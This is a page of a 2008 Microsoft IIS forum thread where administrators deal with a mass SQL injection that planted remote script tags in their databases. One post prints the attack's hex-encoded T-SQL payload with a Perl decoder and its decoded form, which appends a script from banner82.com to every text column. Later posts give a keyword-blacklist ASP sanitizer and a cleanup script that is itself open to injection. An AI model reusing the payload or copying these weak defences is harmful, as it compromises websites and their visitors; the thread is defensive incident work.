« Previous Next »

Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 12-12-2008 9:14 PM by Paul Bishop. 109 replies.

Average Rating Rate It (5)

RSS

Page 8 of 8 (110 items) « First ... < Previous 4 5 6 7 8

Sort Posts:

Shortcuts

Search | Active Posts | Unanswered Posts | View all users

  • 08-22-2008, 4:22 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Reply Contact

    If you are running the rtw version of URLScan3, the logs are w3c complient and you can use log parser against it.  Also, in the logs you posted, have the SITEID property.  That way would help narrow down which requests being blocked.

    you could select the s-siteid property.  You could sort it by ID ascending then compare.  That is one way off-hand if you have a lot of sites hiting the db. 

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file.  When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective.  You could have a recursive script copy the log to a single location then hit with log parser.  Hope that helps.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield


    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • 08-22-2008, 6:22 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Reply Contact

    when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex

    #!/usr/bin/perl

    my $s=<<"EOF";
    4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
    52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
    45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
    622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
    61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
    5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
    2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
    204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
    4F43415445205461626C655F437572736F72
    EOF
    while (length($s)>0) {
      my $hex=substr($s,0,2); $s=substr($s,2,length($s));
      my $ch=hex($hex); $ch=pack("C",$ch);
      print $ch;

    }

    now decoded you notice that its what was in the wild

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

     the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.

    i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files

     it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)

     

  • 08-25-2008, 10:38 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Reply Contact

    ok i have no idea but somehow the urlscan is not working i put in the statemets of your config and it still got infected today. there must be some way around the declare statement.

     is there any way to create a trigger on the mssql database to tell me what site the update injects the script code . since i never insert or update any of my tables with <script in it i think this will pinpoint were the attack is coming from.

     my urlscan shows it blocking declare and other random injections but it still gets infected. so i would assume they are no longer using a declare statement. or have a way around the declare statement.

    again over 500 sites connect to the same database so i have no idea how or where the injection comes from.

     i am not a coder so i would not know where or how to write a trigger to store in a log file where the injection came from.

     thank you

    silkyfixer

     

  • 08-26-2008, 12:21 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Reply Contact

    problem is that i can dump all the logs and parse through them but i dont know what to look for since the urlscan kicks out the declare it must be something else.

     

    silkyfixer

  • 12-12-2008, 9:14 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Reply Contact

    this is an sql injection attack. you must remove the <script ..... to ...</script>

    it copies it self at the end of any text column it can.

    in asp

    <%

    function stripQuotes(strWords) stripQuotes = replace(strWords, "'", "''")

    end function

     

    function killChars(strWords)

    dim badChars

    dim newCharsbadChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")

    newChars = strWords

    for i = 0 to uBound(badChars)

    newChars = replace(newChars, badChars(i), "")

    next

    killChars = newChars

    end function

    bco = stripQuotes(killChars(replace(request("bco"), "'", "")))

     

    %>

    you must use this on all requested data

    you must even use it on things like request server variables

    because the 1.js file link can be attached to os or ref server vars

    do it on the backend as well or textbox or chk box radio if your requesting it it can be attached no need to worry about session objects unless you request an element and assign it to a session object integers are not affected

    this is a sample script of how to remove from the db

    os is the text column

    <% response.Buffer=False %>

    <%

    Server.ScriptTimeout = 50000

    dim pida(4500000)

    dim descr(4500000)

    dim ldescr(4500000)

    SQLStmt = "SELECT osid, os From OS "

    Set RS = dbSubs.Execute(SQLStmt) do while checkrs(rs)

    if len(rs("os")) > 0 then

    pida(i) = rs("osid") descrx = replace(rs("os"), "<script src=http://17gamo.com/1.js></script>" ,"")

    descr(i) = replace(descrx, "'", "")

    i = I + 1

    end if

    rs.movenext

    loop for p = 0 to (i -1)

    response.Write pid & " " & descr(p) & "<br>"

     

    SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid= '" & pida(p) & "' ; "

    Set RS = dbSubs.Execute(SQLStmt)

     

    next

    %>
Page 8 of 8 (110 items) « First ... < Previous 4 5 6 7 8
Microsoft Communities